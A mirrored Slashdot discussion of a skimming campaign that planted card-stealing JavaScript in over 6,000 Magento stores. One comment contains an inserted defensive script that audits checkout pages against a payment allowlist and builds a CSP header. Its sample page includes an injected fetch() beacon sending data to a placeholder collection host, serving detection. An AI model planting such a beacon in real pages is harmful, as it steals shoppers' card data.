Slashdot Mirror


Hackers Hit 6,000 Sites On Active 18-Month Carding Spree (theregister.co.uk)

mask.of.sanity writes from a report via The Register: Hackers have installed skimming scripts on more than 6,000 online stores and are adding 85 each day in a wide-scale active operation that may have compromised hundreds of thousands of credit cards. The malware is infecting stores (full list) running vulnerable versions of the Magento ecommerce platform, and also compromised the U.S. National Republican Senatorial Committee store. "Given that there are [about] 5,900 other skimmed stores, and the malpractice has been going on since at least May last year, I would expect the number of stolen cards in the hundreds of thousands," said Dutch developer Willem de Groot. You can read his blog post to learn more.

39 comments

  1. So basically by Anonymous Coward · · Score: 0

    Nothing that hasn't already been done repeatedly in the last few decades

    1. Re:So basically by Nutria · · Score: 1

      "few decades" is a bit of a stretch. "15 - 20 years" is much more reasonable.

      --
      "I don't know, therefore Aliens" Wafflebox1
  2. Dead Link by mallyn · · Score: 1

    Folks:

    Your link at: https://gist.github.com/gwille... is dead. Please ensure that this is correct.

    Thank you.

    --
    Most Respectfully Yours Mark Allyn Bellingham, Washington
    1. Re:Dead Link by Anonymous Coward · · Score: 0

      Horse shit detected.

      It's not dead. I get a 404 error, as expected.

    2. Re:Dead Link by Anonymous Coward · · Score: 0

      It was already taken down, and if you look at the blog, there's a new link. It also appears to have been taken down.

    3. Re:Dead Link by Anonymous Coward · · Score: 1

      Yep. Although at least the second link seems to have been captured by the wayback machine:

      http://web.archive.org/web/20161014133252/https://gitlab.com/gwillem/public-snippets/snippets/28813

    4. Re:Dead Link by Nutria · · Score: 1

      14kgoldteeth.com

      WTF?

      --
      "I don't know, therefore Aliens" Wafflebox1
    5. Re:Dead Link by Anonymous Coward · · Score: 0

      Having a little trouble with this link. This one should be forever good. https://archive.fo/8u0iB

    6. Re:Dead Link by Anonymous Coward · · Score: 1

      GitHub censored his research and advisories, and deleted the posts. He has moved to GitLab, which most people should be doing anyway given GitHub's cultural issues.

    7. Re:Dead Link by Anonymous Coward · · Score: 0

      Seems like gitlab also kicked his data off, there is nothing there anymore either...

    8. Re:Dead Link by Anonymous Coward · · Score: 0

      Archive of the Gitlab page: https://archive.fo/8u0iB

    9. Re:Dead Link by Anonymous Coward · · Score: 0

      What is it with git and censoring? Everyone should move their projects to CVS or Walgreens.

    10. Re:Dead Link by jcr · · Score: 0

      > GitHub's cultural issues

      Is that the place where the SJWs threw a fit over a sign that said "meritocracy"?

      -jcr

      --
      The only title of honor that a tyrant can grant is "Enemy of the State."
    11. Re:Dead Link by Anonymous Coward · · Score: 1

      > Is that the place where the SJWs threw a fit over a sign that said "meritocracy"?

      Yes, and where SJWs tried to force a "Code of Conduct" onto developers, and where SJWs have appeared in droves pulling stunts like trying to get contributors removed for their personal beliefs that have nothing to do with their project, and throwing victim tantrums because their pull requests weren't accepted. The site and its employees encourage this garbage.

    12. Re:Dead Link by jcr · · Score: 1

      Holy crap, that "djangoconcardiff" character sounds awfully desperate for attention.

      -jcr

      --
      The only title of honor that a tyrant can grant is "Enemy of the State."
  3. Where does the payment data go? by Anonymous Coward · · Score: 0

    > Once a store is under control of a perpetrator, a (Javascript) wiretap is installed that funnels live payment data to an off-shore collection server (mostly in Russia).

    PUUUTIINNN!!!

    1. Re: Where does the payment data go? by Anonymous Coward · · Score: 0

      Yeah, right, put tin never heard of redirection? Spoof?

    2. Re:Where does the payment data go? by grumling · · Score: 1

      --
      "Well, good luck finding a judge that doesn't run a bestiality site."
  4. Everyone who deployed Magento instead of hiring me by Narcocide · · Score: 1

    Told you so. Idiots. Who's untrustworthy now?

  5. They missed thousands of stores! by Gravis+Zero · · Score: 1

    There are at least 3,500 other skimmed stores. That's right, there are over 9000! ;)

    --
    Anons need not reply. Questions end with a question mark.
  6. original article and data by Anonymous Coward · · Score: 0

    https://gwillem.gitlab.io/2016/10/14/github-censored-research-data/

    http://web.archive.org/web/20161014133252/https://gitlab.com/gwillem/public-snippets/snippets/28813

  7. Github just censored my research data by Anonymous Coward · · Score: 0

    https://gwillem.gitlab.io/2016/10/14/github-censored-research-data/

    1. Re:Github just censored my research data by Anonymous Coward · · Score: 0

      https://gitlab.com/gwillem/public-snippets/snippets/28813 is 404

      Did gitlab get a DMCA takedown as well?

  8. Card number disclosure by manu0601 · · Score: 2

    Why do the stores have to see the card numbers? Each time I purchase online, the store redirects me to a payment site tied to its bank.

    1. Re:Card number disclosure by Anonymous Coward · · Score: 1

      > Why do the stores have to see the card numbers? Each time I purchase online, the store redirects me to a payment site tied to its bank.

      Well, they took entire control of the websites, so it wouldn't have changed anything.

      They could redirect you to a phishing website looking like an existing bank with a similar URL, and they could process the legitimate payment at the same time (and if they don't for some reason, they can still easily move your order forward as if the legitimate payment got through, and get away with it until the store notices they aren't actually receiving money on their account anymore... I suppose most small stores don't check every day...).

      The solution would be to restrict payment processing to a known list of independent intermediaries, and have your browser check it before entering your card info. Well, until they get compromised too. Or your browser. Or your computer. Or your router/modem.

      Still, many things are easily possible to at least reduce the risks. But most people, both professional and private individuals, simply don't do anything, or far too little. Most don't even really understand anything about all this, even though it's been talked about so much for a long time. And it's not really that much about money or time. Everything is just completely messed up in this world. It's just insanity.

    2. Re: Card number disclosure by Anonymous Coward · · Score: 0

      Yes, agreed. But you are asking for every mom and pop to be a security programmer. And have equal abilities, they do, actually, but the simplest is sales, not security. So they hire someone whose skill set is security that they can afford, usually not the class leader but middle of the pack, that couldn't sell anything. Any problems there?

    3. Re: Card number disclosure by Anonymous Coward · · Score: 0

      For a while, redirects to payment sites like PayPal were considered to add unwanted "friction" that drove up cart abandonment.

      Recently, the likely most popular gateway, at least in the US, Authorize.net, has added options that allow more seamlessly integrated payment forms that bypass the store's server, though it may not foil browser-based skimming.

      > Magento had been unable to stop this type of attack, even for fully patched stores. The attack surface is far too large for them to manage and the bulk of Magento installs are managed by people with little IT experience.

    4. Re:Card number disclosure by illtud · · Score: 1

      Many, many sites don't, and this doesn't grab your card details server-side, it serves up some JS that makes your browser send the card details to $BADIP as you enter it.
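      The browser-side wiretap illtud describes, and the earlier suggestion of checking payment destinations against a known list of intermediaries, map directly onto a Content-Security-Policy allowlist. As an added example, not code from the thread, The Register, or Magento, the script below audits a constructed checkout page's outbound destinations against an assumed allowlist (shop.example, gateway.example and the documentation address 203.0.113.5 are placeholders) and emits the CSP header that would make the browser enforce it.

```javascript
// Added example (not from the thread or Magento): audit a checkout page's outbound
// destinations against an allowlist of payment origins, then emit the enforcing CSP.
// Assumed values: the store's own origin and its one legitimate gateway.
const ALLOWED_ORIGINS = ["https://shop.example", "https://gateway.example"];

// Collect every URL a page can hand card data to: external script sources, form
// targets and fetch() targets inside inline scripts. Regex extraction is a
// static-review heuristic, not a replacement for the browser enforcing CSP.
function extractDestinations(html) {
  const patterns = [
    /<script[^>]+src=["']([^"']+)["']/gi,
    /<form[^>]+action=["']([^"']+)["']/gi,
    /\bfetch\(\s*["']([^"']+)["']/gi,
  ];
  const found = new Set();
  for (const re of patterns) for (const m of html.matchAll(re)) found.add(m[1]);
  return [...found];
}

// A bare IP literal is a strong signal by itself: real gateways use hostnames.
function isIpLiteral(hostname) {
  return /^\d{1,3}(\.\d{1,3}){3}$/.test(hostname) || hostname.startsWith("[");
}

// Returns the destinations that fall outside the allowlist, each with a reason.
function auditPage(html, pageOrigin, allowed = ALLOWED_ORIGINS) {
  const flagged = [];
  for (const dest of extractDestinations(html)) {
    const url = new URL(dest, pageOrigin); // relative paths resolve to the store
    if (isIpLiteral(url.hostname)) flagged.push({ destination: url.href, reason: "ip-literal" });
    else if (!allowed.includes(url.origin)) flagged.push({ destination: url.href, reason: "origin-not-allowlisted" });
  }
  return flagged;
}

// The enforcing counterpart: with this header the browser refuses any other target.
function buildCsp(allowed = ALLOWED_ORIGINS) {
  const list = allowed.join(" ");
  return `default-src 'self'; script-src ${list}; connect-src ${list}; form-action ${list}`;
}

// Constructed sample page: one legitimate gateway call plus an injected beacon to a
// placeholder collection host (203.0.113.5 is a documentation address, not a real IoC).
const SAMPLE_HTML = `
<script src="https://shop.example/js/checkout.js"></script>
<form action="/checkout/pay"><input name="cc_number"></form>
<script>
  fetch("https://gateway.example/tokenize", { method: "POST" });
  fetch("https://203.0.113.5/collect.php", { method: "POST" });
</script>`;

console.log(auditPage(SAMPLE_HTML, "https://shop.example"), buildCsp());
```

The audit only covers what is visible in the served HTML; a skimmer loaded later by another script is exactly why the CSP header, rather than the static check, is the control that holds at runtime.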

    5. Re:Card number disclosure by Anonymous Coward · · Score: 0

      My answer to this is PayPal. So far, never a problem.

  9. My boss was skimmed at wellforces 6 months ago by Anonymous Coward · · Score: 0

    They were told, but they said that there was no issue and the site was secure.
    So obviously they had another 6 months worth of cards skimmed in that time.

  10. Updated host and link by klui · · Score: 1

    1. Re:Updated host and link by cruff · · Score: 1

      This link returns a 404 now also.

  11. Not stolen by Calydor · · Score: 0

    Let's be honest, the cards aren't stolen. The owners of the cards still have them.

    Copied, however ...

    --
    -=This sig has nothing to do with my comment. Move along now=-
    1. Re:Not stolen by Anonymous Coward · · Score: 0

      > Let's be honest, the cards aren't stolen. The owners of the cards still have them.
      >
      > Copied, however ...

      Well, the cards haven't been copied either, just the online payment info entered by the clients, in this case. Contrary to what is said, it's not a skimming case (if we understand skimming as copying magnetic stripe or chip data).

      (And if you or someone else is thinking about making a cynical parallel to 'pirated' movies, songs and books, they are published, or intended to be published soon, while payment info is private, so it is a different situation).

    2. Re:Not stolen by Anonymous Coward · · Score: 0

      It's closer to theft than piracy is. Once your card number has been copied, you have to stop your card and get a new one. So unlike in piracy, the real owner of the card is deprived of use of the card until the replacement arrives.

    3. Re:Not stolen by Anonymous Coward · · Score: 0

      > It's closer to theft than piracy is. Once your card number has been copied, you have to stop your card and get a new one. So unlike in piracy, the real owner of the card is deprived of use of the card until the replacement arrives.

      Have to stop? Nope, you can keep using it, with diminished revenue, just like the movie studios or record companies. Not deprived, just, you know, sharing it.

  12. Lists of compromised web sites have been removed by Anonymous Coward · · Score: 0

    Lists of compromised web sites have all been removed.

    Perhaps this story could be reposted if/when there is a list that is permanently available?

  13. Re:Lists of compromised web sites have been remove by Anonymous Coward · · Score: 0

    Or the special entitled snowflake could, like, google?

  14. and also compromised the U.S. National Republican by Anonymous Coward · · Score: 0

    It must be the Russians!